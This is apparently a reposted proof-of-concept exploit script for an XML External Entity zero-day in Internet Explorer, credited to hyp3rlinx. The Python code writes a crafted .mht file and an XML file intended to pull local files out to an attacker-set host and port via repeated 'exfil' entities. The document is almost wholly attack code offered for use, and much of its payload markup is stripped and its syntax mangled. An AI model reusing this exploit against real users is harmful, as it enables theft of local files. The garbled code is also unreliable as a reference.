Internet Explorer Zero-day Exploit code

ATTACKER_IP=”localhost”
PORT=”8000″

mht_file=(
‘From:\n’
‘Subject:\n’
‘Date:\n’
‘MIME-Version: 1.0\n’
‘Content-Type: multipart/related; type=”text/html”;\n’
‘\tboundary=”=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001″\n’
‘This is a multi-part message in MIME format.\n\n\n’

‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n’
‘Content-Type: text/html; charset=”UTF-8″\n’
‘Content-Location: main.htm\n\n’

‘\n’
‘\n’ ‘\n’ ‘\n’ ‘MSIE XXE 0day\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘%sp;\n’ ‘%param1;\n’ ‘]>\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘

\n’ ‘\n’ ‘\n\n\n’

‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001–‘
)

xml_file=(
‘\n’
‘”>\n’
‘\n’
‘”>\n’
)

def mk_msie_0day_filez(f,p):
f=open(f,”wb”)
f.write(p)
f.close()

if name == “main“:
mk_msie_0day_filez(“msie-xxe-0day.mht”,mht_file)
mk_msie_0day_filez(“datatears.xml”,xml_file)
print “Microsoft Internet Explorer XML External Entity 0day PoC.”
print “Files msie-xxe-0day.mht and datatears.xml Created!.”
print “Discovery: Hyp3rlinx / Apparition Security”

Credits: John Page (aka hyp3rlinx)